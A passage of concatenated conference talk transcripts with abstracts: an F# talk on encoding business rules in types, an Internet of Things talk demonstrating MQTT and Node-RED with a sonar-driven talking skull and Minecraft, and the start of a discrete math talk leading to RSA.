scenes. So what I really should do is create a new type called an orderline quantity. It wraps an integer. It's not a normal integer. It can't be negative. It can't be 2 billion. There's going to be some sort of constraints on it. And so the nice thing about an F-sharp is I can create a new type just for this domain. It's because it's one line of code. It's really easy. In C-sharp, I should probably do the same thing too, but I probably can't be bothered because it's a lot of work. So most people don't actually do this. And this is the kind of thing where you get bugs in your code because you represent it as an int. And then you have to have special code to handle negatives, special code to handle more than 1,000 or something. Don't have that code. Just don't allow it to be created in the first place if it's not the right number. So in this case, it has to be greater than zero. So even zero is not a valid number for a shopping cart quantity. So if I do something with it, I'm going to have to handle the case where I guarantee by having this type is between 1 and 99. I literally cannot have a zero quantity item in my basket. Yes? AUDIENCE member 1, question. The question is, where would that constructor be implemented? The answer is it would be implemented normally near the type itself. So in Fsharp, you have a module which is basically a namespace or a kind of grouping of codes. And what you can do is you can actually make sure that the constructor is the only way. You can hide the built-in constructor, and you can make sure that people are forced to go through that constructor. And that would be the only way. It's like having a private constructor and then having a public factoring method. And you'd put them together in the same file. Does that make sense? So again, here we return something or we return nothing. So every time I add something to my order line quantity, I have to take into account that I might get something back which isn't an order line quantity. So if I subtract 1, I might get nothing. And in my code, I'll have to say, well, what happens if I get nothing back? Well, OK, maybe I have to move that line from the basket. I'm forced to deal with that code. It reduces bugs just by doing this. So let's have a look at our code quickly, the challenge. So our challenge was how do we do optionals? And we're going to rewrite this now to use constrainString, string50 rather than just a plain old string. So that's a lot easier to see what's going on. And then the other thing, one of the questions is how do I make it very clear which sets of properties have to be grouped together for currency purposes? And it's really easy in F sharp just to create two new little small types. And then the big type just contains the small types. And because it's really easy to do, I mean, this is eight lines of codes. And you can all be in one file. You don't have to create three separate classes and three separate files. So in F sharp, you tend to get a lot more small types than in C sharp just because it's so easy to do. There's one thing we have not talked about, which is this email verified. So this is this Boolean. It's only allowed to be set to true if the email has been verified. So let's have a look at that for a second. So we have some business rules around this. The first business rule is if the email is changed, you have to set it back to false because it's not verified. And the only way you can set it to true is if it's been verified by some sort of verification service. You know, they click on an email and there's a hash in the email and you check that the hash matches. And if it's OK, then it's all good. So those are business rules. Now, again, normally in C sharp, those business rules would be sort of embedded in the code. My question is, can we embed those business rules in the type system? So it's compile time error to get it wrong. So the compiler will not let you set that to true by mistake. Is that even possible? So let's see. So this is not very good. This is terrible because anybody could set it to true and say, oh yeah, this is a verified email address, even though it isn't. So how would you do this in F sharp? Well, the first thing you'd do is you would wrap the email address in a new type called a verified email address. And this is one of the things you tend to get in functional programming, which is any time you have a problem, you solve it by wrapping it in another type. There's no problem that can't be solved by wrapping it in another type, basically. So you tend to have these types within types within types. But because it's a one-liner, it's really easy to do. And it's equally easy to unpack it as well. So now I have a difference now between a normal email address and a verified email address. They're now different types, and they can't get mixed up. That's good. And how do I get one of these verified emails? I have an email service, a verification service, and it takes in an email address as input, and it takes in some sort of hash, which you pass in, and it checks the hash. And if it matches the email, it says, yeah, this is a verified email. Or it might say, actually, it's not. So that's why it's an option. I can tell straight away from this service that it might not work. So email input, an optional verified email is the output. And then what I do is I define my email information as a choice. I say either it's an unverified email or it's a verified email. If it's an unverified email, it's just a normal email address. If it's a verified email, it has to be one of these special verified email addresses. And the only people who can create this is this verification service. I can't create one of these things. Only the verification service can. So when I'm coming along and I want to change the email address, I can change it to unverified, but I can't change it to verified. So this is a way of guaranteeing in the type system that I can't have an accidentally verified email address. So I've got rid of the Boolean and replaced it with two choices. And that's a very common thing you'll see in functional code is every time you have these Boolean flags, like has it been shipped, has the order been paid, all that kind of stuff, those are replaced by a set of states, a set of choices, and each choice might have different types associated with it. So let's go back to our original challenge. Here is our email address. We've broken up into we had one type originally, and now we've got five, six types plus the verification service. The questions were, again, which values are optional, what are the constraints, which fields are linked, and what is the domain logic. So which values are optional? Is this now clear from the code? I could show this to somebody and say, which one's optional? And you say, yeah, the middle initial is optional. The other ones are not optional because they're not allowed to be null, remember? So they're required. The first name is, by definition, required. If I don't say it's optional, it has to be required. The constraints now, I've replaced it with these special types called string 50 or string 1. And the email address, again, is a constrained type. So if I have a first name, I know it's going to be less than 50 characters. I can't, when it comes time to put it into the database, I know that I'm never going to have some database bounds exception that I have to handle because I know it's going to be within the right length. Which fields are linked? Well, that's easy. I just created two little smaller types. That was trivial. And finally, it's the domain logic clear. And it is, I think, because it's now very clear that I have unverified and verified ones. And it's also very clear that the verified email is a different kind of thing than a normal email. What's interesting about this is not only that I've now encoded all those rules in the design, but the ubiquitous language has evolved, too. So in my design, I now have something called an email contact info. I have something called a verified email address. So these are things that I didn't have in the original design. But in fact, these actually do represent concepts in the domain. If I was talking to a business and say, yeah, we have verified emails and we have non-verified emails. So I've actually documented that now, which the original design didn't have. And it's, of course, it's compilable code. This is not pseudo code. This is not a URL diagram. This is real code that compiles. And it would be basically the first file in your F-sharp project. So if you don't mind hanging around for another couple of minutes, I just want to do one more thing, which is this concept called making illegal states unrepresentable. So let's say that some time passes and we now have an address as well as an email. This is the requirements are changing now. And we have a new business rule that the contact must have an email or a postal address. So I need to be able to contact you somehow. That's a fair enough requirement. So does this type actually meet that requirement? And the answer is no, it doesn't. Because the way it stands right now is both the email and the address are required. They're both required fields, right? They can't be null. So they're both required. So this doesn't allow for the fact where I have one but not the other. All right, well, I'll make them both optional. So yeah, does that solve it? No, that doesn't solve it either, because now they could both be missing. So the business requirement is you have to have one of them. You can't have them both missing. So how can I encode that business requirement? Again, in C-Shark, we'd probably have some code varied in a way, well, if they're both null, then throw an exception or return an error or something. It'd be nice if we could actually encode that in the type in such a way that you didn't even have to deal with that case. You could not literally represent that. So that is this concept called make illegal states unrepresentable. If you can't do something, don't even allow it to be in the type system. In this design, I could make them both optional or both null. It's like, don't allow that to happen. So how can I prevent that from happening in the type system? Well, if you think about it, that business rule says that you either have an email address or you have a post address or you have both. That's what the business rule says. There's only three choices, not four choices, not two choices. Well, how would you represent that? Well, as I say, you always wrap everything in a type. You create a new type with three choices, where it's email-only or address-only or an email and postal address. So I now have a type that represents that business rule. And I literally cannot have both of them missing, because it's not one of the choices in the type. But so by defying a type like this, I can actually hard code my business rule into my design in such a way that I literally cannot mess it up. You cannot have a bug from having them both missing, because there is no way to represent them both missing. And then I just replaced my email address as just one new type now. So what I've done is I started with them as separate things, and I've merged them into a single thing, which now has a set of choices. So static types are really awesome, almost as awesome as that. One final thing, let's say that that's a rather restrictive thing, an email address or a postal address. What they probably mean is the business probably didn't really mean that. What they probably meant is there's some way that you have to have at least one way of being contacted, because you're a contact. I should be able to contact you in at least one way. So rather than doing that, what I might do is say, well, this is different ways of contacting you. I can contact you with an email, or I can contact you by sending you a letter. And then in the contact type or structure, I have a primary contact information and a secondary contact information. And the primary contact information is required, and the secondary contact is optional. So again, the type system has created, again, it might be something that when you talk about this, the business zone. So yeah, of course, we have a primary contact and a secondary contact. It's a new part of the domain language now. You've got a part of the ubiquitous language to have a concept of a primary contact. And again, the primary contact is not allowed to be null, so it's by definition required. It's very clear from this code what the business rule is. So I talked about the challenge. I talked about ubiquitous language, self-documenting designs, algebraic types, designing with types, using options, single case unions, and making illegal states unrepresentable. So hopefully this all makes sense now. I haven't talked about states and transitions. That's a really important thing. Services, CQOS, how you do the functional approach to doing use cases, and domain events, and error handling. So if you're worried about using F-sharp, I actually think you should just try it out. Like I said, even if you just use the type system and don't write any code, the support of Microsoft, if you want to go mobile, it's built into Xamarin Studio. That gets you F-sharp on millions of platforms. So it's a very safe choice. If you need to persuade your manager, I have some examples at FP Bridge. And there is the link to my site, F-sharp on Twitter if you've got any questions. Contact me on Twitter. And if you need any help with F-sharp, contact me at my consulting business. Thanks very much. If you have any questions, please come and see me afterwards, and please remember to put the review things, yes. And there are some more F-sharp things tomorrow morning, by the way. Two F-sharp talks tomorrow morning if you're interested in F-sharp. Please go to those.
|
Statically typed functional programming languages like F# encourage a very different way of thinking about types. The type system is your friend, not an annoyance, and can be used in many ways that might not be familiar to OO programmers. Types can be used to represent the domain in a fine-grained, self documenting way. And in many cases, types can even be used to encode business rules so that you literally cannot create incorrect code. You can then use the static type checking almost as an instant unit test — making sure that your code is correct at compile time. In this talk, we'll look at some of the ways you can use types as part of a domain driven design process, with some simple real world examples in F#. No jargon, no maths, and no prior F# experience necessary.
|
10.5446/50869 (DOI)
|
Hello. Good morning. Was the party great last night? Who or you are not hungover? Some of you must be lying. Welcome to my talk about the Internet of Things. I am Simon Somefelt. I work for the CTO at Bouvet in Oslo. I also founded the national movement to teach kids to code. Do any of your kids code at all? Good. Good. You save them. With me I got Keith Richards. I connected him with a... Oh, well. I asked my friends on Twitter and Facebook what to name him. I also suggested. But YouTube made a decision. I uploaded the video after I played it. He found similarities. So we named him Keith. He is connected via some mechanisms. I will talk to you about that later on. That alerts him when somebody is getting too close. I will talk about what we say. Some thoughts on how to get started in enterprise and what it can be for all of us. And what I think must be the enablers. That is more like philosophical in the future. And what the vendors are saying and the relevant standards. We exist for protocols today. And I will dive into one called MQTT. And a nice tool called Node Red. I mean, this Internet of Things concept is changing all the time and people change their opinion. But at least you get one thing out of this talk. And that is an idea on how to scare the kids in Halloween. By using this setup or a similar setup. Like I said, the Internet of Things is a really confusing topic. Every day there are like 10 more articles at least or maybe 100 saying seven ways the Internet of Things can improve your sex life or five things the Internet of Things means to a CEO and something. And it has been really hard to filter it all and try to digest something out of it. Because this is just happening all the time. I wrote a blog post about how, with a little story I'm going to tell you later on. Where I tried to picture what it can be in the future and why I think it's not coming so soon. And because I had written one article that wasn't just cheerful about it, I was contacted by two national newspapers and interviewed about it. The one article that says it's not coming next year. And they called me like the new weeks next but on this, which is kind of scary. And now I maybe call an official Luddite. The Internet of Things is supposed to bring huge businesses and huge numbers of devices very soon. Like IDC says it will be 8.9 trillion market in 2012, in 2020. In contrast the gross domestic product of the US is 15.5 trillion. So I guess it's going to boost that market a little bit. By the way, I stole this slide from a Microsoft presentation just to say that. But Dion Hinchcliffe says that there are actually two different Internet of Things. One is the enterprise one. And it has existed for a while. Where they use sensors, you know, in logistics and to control things. And in the enterprise it supports business processes by sensors using big data orchestration and perhaps even machine learning to make things run better. And Microsoft and IBM are the two companies I found have the most complete stacks, the most complete offering. For Microsoft everything is about the cloud. They want to put everything in the Azure of course. But they have a complete development stack for all kinds of devices. All from the smallest ones like the connect to the Nike fuel band and in Arduino's and Raspberries and up to cars. The same goes with IBM. They also have a big comprehensive solution. But they have the same philosophy that you can capture, connect, analyze, and act and use the cloud all the time. But the other Internet of Things is just getting started, the consumer one. And it's only been happening in a significant way the last two or three years. I promise that gives some advice for if you want to use IoT technology in enterprise systems. I kind of regret I did that because it's not easy because every system you have is kind of different. But I asked Michelle Polino at Forest Research what she could say was like the common denominator if you want to add sensors or presence into your systems. And she said that you need to involve all kinds of trades in the company because this can involve, this is actually a customer experience thing if you have humans involved. And you might have to talk to the CRM people, software architects, partners, sales, maybe even lawyers and other stakeholders. So it's not just for techies if you want to get the full potential. And of course, if you're adding sensors, if you're adding objects that have their own intelligence, you're also making potential security holes in your system. And the only thing about privacy and especially operations because if you have something running out there, it needs to be maintained, replaced, but if you do a software upgrade, there's a lot of other things to think about. Well, in the consumer space, which the newspapers now are very busy talking about, we're being told that everything gets connected from phones, houses, cars, buses, everything, everything is supposed to service. And it looks really fantastic, doesn't it? And we're told it's going to happen in like four years. But what is the consumer internet thing? It's very hard to define and we haven't got really a unified definition of it. But Patrick Thibodeau has a very good question that you can ask. If one vendor works with another vendor's product and they communicate without you have to fiddle with them, and so just put something in your home, I think we'll get going. And we're not there yet, not by far. To tell you a little bit about how I think the future can be, I wrote a little essay, which I put in my blog post. And I think that all the different corners, all the different aspects of the internet things maybe can work together to make a bigger whole sometime in the future. To serve us better, to make us utilize the resources better, to save power, to make life easier for us. And this story is about my daughter when she's grown up. So I had her to illustrate it. And it starts in the year 2030. There's me getting quite old with a cane. And she has been alerted that I had the danger of high blood pressure. She comes by with a dog, which looks very similar to the dog we have today. And then she checks on me and she calls the doctor and yells at him for being so negligent about my health. And then she leaves the house because she's been told that one electric heater in the house has been ailing. So she goes into a shop and she looks at different, you see the prices here, different products. And this one she really likes. So seemingly she talks to herself and then she buys it. And it automatically checks whether it fits in her house and the security is checked, it's authenticated, the purchase is made. And she goes out of the store and she's being picked up automatically by a transport without the driver, of course. I have to debate that with my daughter. So in the end she put the flower there in the driver's seat. And it leaves her off at her house and there she goes to put the heater in the place and you see I already come to enjoy the heat from it. When she puts it in the place, in the room, it's automatically set up. It doesn't need to be configured anyway. She doesn't have to like put anything on any panel. It just reports to be electric heater in the northwest on the first floor and it's ready to be told if it should turn off the heat. And then she doesn't think more about it. And she goes to play with her children and afterwards at a dinner meal, evening meal she tells her husband about the stupid doctors that she finally got around to replace this electric heater and then they discuss their summer holiday. So this just serves her. She never sees a software interface or has to change anything. She just goes on with her life. This just serves her lives. And to make this happen, I thought what must be in place? What must be the enabler for this? I think one is device classification and interoperability. I like this quote very good. This is from Rosmason of Mulesoft. On the Internet nobody knows you're a toaster. If you put an appliance like your fridge or oven today that you can buy a fridge that has Facebook integration, it won't classify itself as a fridge. If you have like a TV with YouTube on it, it's so cold the Internet will think, they don't know about each other. You can't control the fridge from the TV. They don't talk. Because nobody has agreed about any standard that the devices have or even that there are different devices. There are lists like this one with intellectual property database where you can see that there's an electric radiator, this number here. But I've never seen it referenced in any article about the Internet of Things. And you have lots of protocols in which the different devices can talk to each other. But all the different vendors seem to be hedging on their own different ones. There doesn't seem to be any agreement. And it goes like this. Because they have all invested in their own thingies and their own alliances. So as Patrick says again, there's no wonder which is large enough to define it, but there are certain vendors that are big enough to mess with. The other one is connectivity and address space. You don't need to have an IP address to have a connected thing. You can use Bluetooth. You can all allow powered network standards. And they can form mesh networks. But still, if you think the numbers are like 200 billion devices, then we need to have IPv6 for that to happen. If you want to move a thing out of the living room to go another place, you must have an IP address. And IPv4 is running out. Everybody knows that. But since IPv6 doesn't really present any tangible benefits for the average consumer, there's no rush to get it. Like if I tell my mother-in-law she should get IPv6, she says what? What is it? Well, it's the glue that makes your browser connect to that web server. So. But the problem is that devices who are on IPv6 networks, they don't see servers who are on IPv4 networks. Myself, I got an IPv6 router. But only 10% of the websites in Norway serve IPv6. So it's going to be quite a slow change. And the third one, I think is the most important. It's the security, privacy, and authentication. Imagine if all the ovens or all the fridges and your devices are connected in the house and they can be reached from the Internet, maybe even also control from the cloud. What if a foreign power decides to attack? They don't need to send bomb replace. They can just make all the houses burned down by hacking them. Or even a software update. That is wrong. And also we're taking all the problems and weaknesses we have today in the Internet with us into the Internet of Things. I mean, there is a story, this is a true story of the DVR recorder that was used to send spam mails and attacked. And the vendors that make house appliances, they're not really software people. They make fridges, they make ovens. So they have a summer intern to make the software and the devices. And they're so easy to attack. And the problem even becomes larger with IPv6 because your router in your living room, it has NAT, it translates the addresses, and accidentally it's a firewall because you can't reach the devices from outside. But with IPv6, all the devices have their own IP addresses on the Internet. So it could be like a variable hack feast if you don't have a good firewall in place. Third, privacy. This is a picture of a concierge in a hotel in San Francisco. When people approach this desk, they're automatically Googled by his glass and checked if they have, if they're sold. Makes you feel a bit skimpy, doesn't it? When our local broadcaster NRK borrowed Google Glass and took it on the street to make people test it, they reacted with fear. Because they thought, oh, no, NSA is going to see me here as well. No, I can't go anywhere without being seen. And this is in a hotel lobby today. And tomorrow, if we have this, if every home is connected and everything can be seen anywhere, and the surveillance is like today, and no politicians are doing anything about it, it can end up like this. Who have you seen Minority Report? Anyone? Good. There are three people submerged in water who dream of crimes being committed in the future. But when we add all this data from all these sensors and all these presence, they can detect all of how it will behave, and you can use machine learning to check, will he commit a crime or not? And with the current technology, Tom Cruise wouldn't even get out of his house. The doors would be locked for him. Do we want this? I don't know. We can do this with today's technology, actually. And then there's the open business models. Today you can buy a coffee machine that can actually ask to get more capsules, and you have an app for it on your phone, and you can have an app for your fridge, maybe not for your toaster, but for your coffee machine, and you have to have an app for every single device in your house. So the business model is with exactly one actor, that company. But that won't scale. I think it's been influenced by like companies like Apple and Amazon, but you can't have that in the real life. You won't buy all your kitchen appliances from one vendor, or all your appliances in your whole home. They had to talk to each other. And lastly, user experience. I read an article testing three different home automation systems. This was tested by a guy who was quite knowledgeable, technically, but they were all horrible. And I couldn't connect to the devices, and it dropped, and it was really hard to configure it. Imagine giving that to my mother-in-law. And I think Jacob Naleson said, if it's a, usability is like a joke. It's really bad if you have to explain it. And now we have to explain everything. And common for all of them is that we need open standards, and I'm preferably open source for this. So if you do the math, if you take all these different aspects, it's going to take time. I don't know, 20, 20, 20, 30, I don't know. So I thought, am I insane? Will I be a gnasty, this stupid Ludaite who thought everything was going so slow? So I contacted people from different kinds of organizations and had them read my essay, and they all kind of agreed, well, it's not so stupid. So either we are all insane or it's something about it. And I think Michel Pelino at Forester Research says something good about this, that it's happening very fast in vertical businesses or in closed markets because they agree upon some standards. Like in logistics, for example, they have a motivation to agree upon something and then it can happen quickly. But in the consumer space, there's no really incentive from all the vendors and actors to agree upon anything. And it's also the mindset and the understanding of the politicians like this privacy thing, which I think makes it a bit slower. We have lots of consumer products. I mean, these are all the offerings you can have for whole automation systems. And on the west coast of Norway, the grid, the power grid, utility grid, they offer a total home control system to the 130,000 customers if they want. You have burglar alarm, you can control the heat from your app, you can change the lighting. And the international, like the most exciting vendor I think is Google because they have the Nest product, which controls heats in houses, heating in houses. And as you saw, they have the Google glass. And they even have self-driving cars. And they have the Android platform to connect everything. Back to this interoperability question. The Linux Foundation has gathered all these companies who make appliances or network products and invited them to make a protocol and a set of software specifications that make things talk together, which is called the All-Sin Alliance. So you have lots of active devices with computers in them. And they promised that soon they will be able to talk about changes to each other. And they can even export control to all the devices from different vendors. And if some of them have not got internet connection, they can form mesh networks and give each other connectivity. And this is an API and some libraries for lots of different platforms, I think even for the Raspberry, where you have presence, where you can send messages, they can control each other, they can discover each other. And it looks kind of promising. Well, imagine that you are in a cocktail party with all the different vendors of home automation systems. And they're drinking and chatting nervously. In the hammock outside, there's this beer. And they're kind of looking at him nervously. What will he do? Will there be something called Siri, turn on the lights in your living room? Well, last Monday, it was announced, the Apple's home kit. Which is really smart, because they have got a lot of different vendors to agree upon or invite a lot of vendors to publish their interfaces and allow Siri to turn up the heating. This could be the tipping point. Maybe. I don't know. Maybe there will be an antidote, trust lawsuit from Samsung. I'm sure there will be. But this could be the thing that moves things forward. I guess, how many iPhones? Right. That's all there is to it. Just tell Siri to turn up the heat. All right. I'm going to tell you about one protocol and one tool that I find is really interesting with regards to Internet of Things, using this setup. And to do this, I'm emulating that we have different devices. You saw I had this, which tells the distance. I have, since I'm running a coding for kids setup, I've also made a set of Minecraft services that can detect presence. I hope this works now. So what you see here, going on here, is the other messages on the MQTT bus. So it's telling the distance for this alarm right now. I'm connecting so far so good. Okay. I have to run a command to connect to the server. There we are. Okay. So I'm outside. Do your kids use Minecraft, anyone? Have kids with Minecraft? Yeah. You can take this home and show it to them. It's all on the screen. All right. Look. There's a castle there. Sometimes there are sheep around too. Oh. A door. It looks to be a skull there. Go ahead. Make my day. The skull detected, oh, it doesn't look very nice, this person. Okay. I'll just go inside and check. Oh, no. He's following me. What's happening if I destroy this castle? Oops. It's not working. With demo effect. Oh, I can change his eyes. He doesn't like me messing with this castle. Okay. I think I'll leave this place. You're not pickable. Well, you too. All right. What I showed you there is it could be physical devices as well. You can actually use face trackers also with a normal camera, which I think I'm going to do on Halloween with the kids coming for candy. I think I have to check the rage first so they don't wet themselves. The thing, the protocol I used for these devices to talk to you is MQTT. Have you heard of MQTT before? Some of you. It was invented by Dr. Anders Stankler Clark, a IBM and Arlen Nipper of Arkham. He's a good TED talk about it because they needed to connect devices and get all kinds of measurements and control the devices or unreliable networks and bandwidth and also on devices that have really low processing power. So it is a really simple pub-sub protocol. If you read this Gregor Hope book with the enterprise integration pattern, you can recognize it there. But the cool thing is that you can give a path with your topics. So you start with where this is, the address of the device, the type of it, and unique identifier, and then you give a status. Like in Minecraft, when there's in Minecraft this world, the skull at this position has a status is alone. That fired your despicable message. And the cool thing is that you can search, you can actually subscribe to topic trees with wild cards. So, for example, I can change a part of the branch here with just a hash and then I can end everything after it. So I can get all the skulls or I can use a plus and I can take any link here in the tree, which makes it really easy to specify what you want to get. And you can have multiple brokers. There are even cloud brokers. So if you want to do a home automation system and you are brave enough, you can have it controlled by a cloud broker and they can shard the different topics on different brokers and broadcast them to each other. It's got some really cool IoT friendly tricks up its sleeve. When a device connects and starts to publish, it can tell the broker that it has a last will and testament. So if somebody else subscribes to that topic and the publisher dies, the protocol will send this testament to the subscribers, notifying them that this died or went offline. It has got a binary payload so you can just put anything there. JSON, XML, binary, encrypted. And it has some different quality of service levels if you want to make sure it comes through. And when you publish a topic, you can have a retained message there so that the device starts to subscribe to that topic, it will get that message the first time, thereby saying that you are connected. It's only got two byte overhead on every message. A very small footprint, it runs on my Raspberry here. And it was, I think Stephen Nicholas did a very good fascinating Apple's comparison when he tried for a web client to check for notifications to changes in the data. He compared MQTT versus long polling over HTTPS. And you see the very, very huge difference between the energy expenditure and the bandwidth. And here you got Facebook messenger in your phone, in your pocket, in your phone, almost, yeah, lots of you. Then you got MQTT in your pocket. Because Facebook got so many complaints from people that the messenger application drained the batteries so they changed the protocol to MQTT. And it dramatically improved. And it's so simple that when I sat there in the kitchen toying with this skull, my children can actually look across my shoulder and suggest changes because it's very, very simple to understand. And it's very simple to set up on the Raspberry. It's one line of Linux command to install it and it runs. And you can combine it if you have a REST application at work. You can, for example, use MQTT and use the topic path similar to the URI in your REST application to give notifications of changes so that the clients can reload their data. No dread, it's a if, this, then, not for internal things. What you do, I mean, when you're making these applications with all the different devices, a lot of the code you write is plumbering code to just connect things. And here you get past that because you have lots of inputs there that you connect with logic and then put it on outputs. It runs. So we have many different inputs like this MQTT queue. You can use WebSocket. You can even use Twitter or IRC. Like here. And you can store it in MongoDB or Redis if you like or even get the information from MongoDB. It's based on Node.js. And it's, you can include it in other, embed it in other Node.js packages or use other Node.js packages. So I've tried installed it on my Raspberry. I spent one hour making one of the more complex flows. And to do that, in Python, I'd spent 20 hours at least to do that because there's a lot of timing issues involved. Like you saw, the skull when I move it in front of the sonar. First, there's one thing, then the other thing. And then you have to postpone execution of commands and so on and so forth using threading and it makes your code look hideous. But with Node Red, it becomes much, much easier to do that. Node Red is not an enterprise grade tool yet. But if you want to make your own home control system, I think it can be quite fun to do. With my own setup here, I use the Arduino with the servo shield because the servos, they draw so much power, they take half a lamp each. And the Arduino can't drive that. Then I had to connect it to a Raspberry. We are logical that we convert it. Otherwise, it would toast the Raspberry because the Arduino runs on 5 volts and the Raspberry runs on 3.5. There's the Raspberry Pi and there's the other Arduino which is pulling on the sonar. And there's the breadboard power supply which has 1.5 amps which pumps into that servo shield. The skull, I just bought at the local novelty store and I bought a pan tilt servo set from eBay. Costing like 200 Kroner or something. And then I used a third servo to control the jaw. And on the Raspberry Pi, I run the MQTT server and the Node Red server. And it doesn't require much resources. And then for those who want to do this at home with your kids, you can install the bucket server which makes it possible to use plug-ins on Minecraft. And then I have a scriptcraft plug-in which allows you to control Minecraft with the JavaScript. And I asked the author, Walter Higgins, if he could kindly enable MQTT on it and he thought it was so cool so he did it over a weekend. So thereby I could connect these things. Now, if you look at the log from the MQTTQ, what's happening is that when I put my hand in front of it, it tells that 29 centimeters distance from the sonar. And then the same kind of sonar exists in Minecraft with a similar distance. And there it tells that the skull has company. And then the broker tells the Arduino to turn the lights on. That's what you saw when Clint Eastwood welcomed us in the Minecraft castle. And here's the face tracker. It actually calculates the vector from the player to that skull standing on that stone and takes the sign values of the vector and the broker will then make transfer that into servo movements here. And here I told the levers. And then it sends a command to change the light, the led lamp. And you can change these words and sensors and things into like your oven or your lights in your living room or whatever. And just fiddle with it because it's very easy to test. You can just push the commands on the protocol and it will automatically do things. Yeah. And here it says I'm alone and it turns off the lights and so on. When I started with this, I knew nothing about Arduino. I had many, many years ago I had learned electronics. But I got started with this spark fun in vendors kit and I can really recommend that because it contains a lot of different sensors and the servo and motor. And it has this really nice book which takes you through very simple exercises like this one makes a blink. And when we have kids to try this, I think it's immensely fun because there's something physically happening. And for you to start learning this, when you walk through the whole book, trying to control a servo, trying to use a temperature sensors, trying to change the lights using relays, you can step by step get lots of ideas to control stuff and have fun. So this is kind of the dynamic duo of the hobby home control systems. You can connect most meters, presence detections, temperatures, anything. You can control lights, survey, relays and you can have a combination of this many different places in your house. What I, the sensors I had in Minecraft was at this goal that it takes if the player is near. That would be cool to have in real life, wouldn't it? And the sonar which does exactly the same thing as this physical one. And then redstone levers. And then the block destruction. That's on how we're Simpson said. And finally, the face tracker that gives the vector to the player. This I made in JavaScript. And as you can see the code is really compact up above there. The code is made to find out where the player is. But here is all the code that was necessary to make, to calculate the vectors for the face tracker. And then I published this on the MQTT broker. So this was done in Node Red which I'll show you. This is how it looked like. All the logic that is executed when I do this is what you see here. So I'm getting this sensor, the sonar, strips away the ping text. Then check if that number is less than 30. Then I check if the skull is busy because there's only one skull. And if there's other things going on, I might not want to disturb that. And then I make a delay. And this is where it becomes so much easier than using a normal programming code. Because here you would have to use threading in another program. And then I turn right. Or if I want it right now, I can change this to turn left instead. See what's happening. So I can inject messages just to test things. Oops. I think I need to... Oops. The demo virus. Yes. What I do is I turn it off. Then I have to start this... Oh. It's even losing the wig. I think I turned it off. Sorry. But what I can do is that I can take away this connection from this. And then I can make a new flow. So here you will see the distance reading should be coming here. There in the debug. So you see on the lower right there it's getting new distances. And then I can take away this ping message from it. And just get the number. So you see what I'm doing now is I'm connecting the input with a logical flow with the messages. And I can see the result immediately. And this you could do with your appliances in your home or temperature meters and just play around with it. So now you see the ping text is taking away. Then I can take that output and see and test on it whether it's so close that I want to do something. So if it's less than 10, I can send a blink command, for example, to this skull and the lights will blink. Or if the temperature was lower than a special you can make your oven turn on. And then I send that to the Arduino. So let's see if the lights are blinking. Oh no. I forgot to connect it there. And there are. And I can have maybe I also want to make a sound. And then I send a special command to another service which is controlling a sound on the Raspberry. And you can say something. And you can mix and match and do all kinds of things with your devices without having to reprogram it. If I had written this in Python, I would spend lots and lots of time testing it, making different, oh no, I made another thread. What's happening with it now? But here you can just concentrate. I even connected my home router which runs Linux to the Node Red server. And then I can detect if one of the kids was at home. Because if they're home, their iPhone, it has an IP address. So I made a sound play in the living room with my youngest son when he came home asking him if he did the homework. And my oldest son, if it was Friday and he came home, it would remind him to do the vacuuming. But it wasn't very popular. And I found out it became like the big dictator in our home. So all this is described in this blog post if you want to get started with this. And it's on the GitHub. The code was written for fun, so it's written by assumption that works by coincidence. I want to thank these people for giving me lots of feedback and input to the articles and my thoughts. And we have an Internet of Things meetup here in Oslo where we'll discuss possibilities and do demos and stuff. And the first meeting is on the 24th of June. So you're welcome there if you'd like to discuss more. Are there any questions? The question was where the Node Red code was deployed. Yes. It is deployed on the Raspberry Pi with the normal Linux package manager and then you use the Node Red package manager. Now, sorry, you install the Node.js and then you use the Node.js package manager to install Node Red. They're like one-line commands each. And then you can, there's actually a repository online with the flows that you can see and check. And you can make your own nodes, actually, Node Red. So if you have an input you want to add or a specific command you want to add, you can just provide the HTML and the JavaScript and you can use it in your flow. Other questions? No? Early in the morning? Okay, thank you. And please vote on your way out. I was told by one of the people working here to put a color of how well you liked my talk on the way out. Thank you.
|
My aim is to clear away some misunderstandings regarding the Internet of Things, and introduce MQTT - a protocol that is considered one of the most promising protocols. I'll start with a live demo of my IoT setup with a sonar, Arduino, Raspberry PI, MQTT, a talking Skull, Node.red, Sensors and Minecraft! Perhaps you can use the setup to have an entertaining Halloween… Part one of this talk provides a picture of what the selling points for IoT are - and some of the obstacles we’ll met on our way to get there.Part two focuses on technology: Different competing standards for IoT - with examples. This should be relevant to many of the listeners, as most consultancies and companies will come across IoT in the coming years. How I use one of the most promising protocols - MQTT - in a hobby project that can also involve children in order to teach a little coding, a bit about internet of things, and some hobby electronics. I'll introduce Node.red - a node.js based framework for orchestration of IoT and MQTT. I'm going to show message flow, source code, live influence of the components, and best practices for MQTT orchestration In conclusion I’ll give examples on how you can combine use IoT technologies like MQTT in typical business systems to bridge them to the physical world via sensors and indicators.
|
10.5446/50871 (DOI)
|
All right, let's get started. So I do have this light over here. I said this in my last talk an hour ago. I do have the feeling that an alien abduction is taking place. It's just like I could just see this UFO here. So that, okay, so in America that's a joke. We would call that a joke. And you do that. That's perfect. All right, good. We can do this. Welcome and thank you for coming here. Is everybody enjoying NDC? It's going well? Good. Good. Seems like it's going really great. I am delighted to be here. I'm Tim Berglund, TL Berglund on Twitter. I work for DataStacks, where the company that makes the commercial distribution of Apache Cassandra, which is a scalable, fault tolerant database, but man does not live by databases alone. And so sometimes there are other fun things to talk about. And I hope that this is one of those topics. So if you studied computer science in university, regardless of how long ago that was, this is typically there is a class in four years of study in discrete math. You'll take a semester of discrete math. I certainly remember when I took it, my degree was kind of more like electrical engineering, but it had enough software stuff in there that discrete math was in the program. And it was one of those things where it was just mind blowing. I mean, I remember the sort of problems you can solve with this just don't even look like math problems, but really, really neat stuff in here. And that's typical, you know, most undergraduates, they take it, they're like, wow, this is really cool. And then you never touch it again. Maybe you'll wander across a hacker news post that mentions some combinatorics thing, and you're like, oh yeah, we did that. And so the purpose of this talk is honestly just to have some fun with this stuff. It's stuff that most of us have studied before. And the typical experience people have is we remember that stuff and see some of what it's good for. So we'll see some things that are clearly practical. Some of it is just raw fun with numbers. We'll do a little bit of that. And the direction of the talk, it's not all just one story arc. You know, there's a lot of little things we'll talk about, but we're going to end up looking at the RSA algorithm or the thing that gets public key cryptography done. We're going to look at how to create public and private key pairs and the actual calculation that is done with those numbers on the messages that we send back and forth over the internet when we're using PKI. So that's an eminently practical application. We're going to end on that. To get there, we're going to have to wander through some theorems about things that by themselves they don't seem all that useful, but they are going somewhere. We're going to end up actually doing RSA calculations and seeing how all 